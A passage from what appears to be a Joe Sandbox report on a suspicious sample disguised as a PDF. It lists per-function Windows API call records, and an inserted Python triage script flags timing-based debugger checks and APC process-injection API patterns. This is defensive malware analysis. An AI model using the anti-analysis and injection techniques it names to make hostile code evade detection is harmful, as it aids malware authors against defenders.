                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                              • SendMessageW.USER32 ref: 00471AE3
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 3611059338-0
                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow$DeleteObject$IconMove
                              • String ID:
                              • API String ID: 1640429340-0
                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcslen.LIBCMT ref: 004438CD
                              • _wcslen.LIBCMT ref: 004438E6
                              • _wcstok.LIBCMT ref: 004438F8
                              • _wcslen.LIBCMT ref: 0044390C
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                              • _wcstok.LIBCMT ref: 00443931
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                              • String ID:
                              • API String ID: 3632110297-0
                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteMenuObject$IconWindow
                              • String ID:
                              • API String ID: 752480666-0
                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                              APIs
                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
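The record above (Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, QueryPerformanceCounter at 004331B9 through 004331F0) is the code behind the report's "Contains functionality for execution timing, often used to detect debuggers" signature: the function reads the high-resolution counter on both sides of a Sleep, which exposes a debugger single-stepping through it or a sandbox that fast-forwards sleeps. The same sequence is also an ordinary timer calibration, so on its own it is a low-confidence indicator and worth confirming against the surrounding code. The script below is an added triage example, not part of the Joe Sandbox report or its tooling: it parses the text form of these per-function records and flags functions whose API set matches a small rule table. The rule table and its names are this example's own assumptions, and the sample input is two records copied from this page.

```python
"""Triage Joe Sandbox per-function API records for anti-analysis patterns.

Added example; not part of the Joe Sandbox report. Parses the text form of
the "APIs" / "Similarity" records shown on the page and flags functions whose
API set matches a hand-written rule table (the rules are assumptions).
"""
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function <addr>: ", then Name.MODULE,
# an optional argument list, then "ref: <addr>". The report omits the
# parentheses for some calls (e.g. "SendMessageW.USER32 ref: 004555C7").
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
OPCODE_LINE = re.compile(r"^•\s+Opcode ID: (?P<id>[0-9a-f]{64})\s*$")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    calls: list = field(default_factory=list)  # (api_name, module, ref, from_subcall)


# Rule table (assumption): every API in the set must occur in one function.
RULES = {
    # QueryPerformanceCounter before and after a Sleep measures whether the sleep
    # really took that long: a classic debugger / time-acceleration check, but also
    # a legitimate timer calibration, so treat a hit as low confidence.
    "timing-check": {"Sleep", "QueryPerformanceCounter"},
    # Writing into another process and queueing an APC there is the injection
    # primitive behind the report's "Queues an APC in another process" signature.
    "apc-injection": {"WriteProcessMemory", "QueueUserAPC"},
}


def parse_records(text):
    """Split report text into FunctionRecord objects, one per 'APIs' header."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # each function record on the page starts here
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current.calls.append((m["name"], m["module"], m["ref"].upper(), m["sub"] is not None))
            continue
        m = OPCODE_LINE.match(line)
        if m:
            current.opcode_id = m["id"]
    return records


def triage(text, rules=RULES):
    """Return one hit per (function, rule) whose API set satisfies the rule."""
    hits = []
    for rec in parse_records(text):
        names = {name for name, _, _, _ in rec.calls}
        for rule, needed in rules.items():
            if needed <= names:
                hits.append({
                    "rule": rule,
                    "opcode_id": rec.opcode_id,
                    "refs": [ref for name, _, ref, _ in rec.calls if name in needed],
                })
    return hits


# Constructed sample: two records copied from this report (a benign paint
# handler and the timing routine at 004331B9).
SAMPLE = """\
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• EndPaint.USER32(?,?), ref: 00447D13
Similarity
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
APIs
• Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
Similarity
• Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit["rule"], hit["opcode_id"][:16], ", ".join(hit["refs"]))
```

Feed it the exported text of a whole report rather than this excerpt; a "timing-check" hit is a pointer to where to read the disassembly, not a verdict, and the record's "Source File" line names the memory dump to pull for the code between the two counter reads.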
                              APIs
                              • SendMessageW.USER32 ref: 004555C7
                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                              • String ID:
                              • API String ID: 3691411573-0
                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                              • LineTo.GDI32(?,?,?), ref: 004472AC
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                              • LineTo.GDI32(?,?,?), ref: 004472C6
                              • EndPath.GDI32(?), ref: 004472D6
                              • StrokePath.GDI32(?), ref: 004472E4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                              • String ID:
                              • API String ID: 372113273-0
                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                              APIs
                              • GetDC.USER32(00000000), ref: 0044CC6D
                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                              Similarity
                              • API ID: CapsDevice$Release
                              • String ID:
                              • API String ID: 1035833867-0
                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                              APIs
                              • __getptd.LIBCMT ref: 0041708E
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __amsg_exit.LIBCMT ref: 004170AE
                              • __lock.LIBCMT ref: 004170BE
                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                              • _free.LIBCMT ref: 004170EE
                              • InterlockedIncrement.KERNEL32(017317F0), ref: 00417106
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                              • String ID:
                              • API String ID: 3470314060-0
                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 442100245-0
                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                              • _wcslen.LIBCMT ref: 0045F94A
                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                              Similarity
                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                              • String ID: 0
                              • API String ID: 621800784-4108050209
                              • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SetErrorMode.KERNEL32 ref: 004781CE
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • SetErrorMode.KERNEL32(?), ref: 00478270
                              • SetErrorMode.KERNEL32(?), ref: 00478340
                              Similarity
                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                              • String ID: \VH
                              • API String ID: 3884216118-234962358
                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                              APIs
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                              • IsMenu.USER32(?), ref: 0044854D
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                              • DrawMenuBar.USER32 ref: 004485AF
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert
                              • String ID: 0
                              • API String ID: 3076010158-4108050209
                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
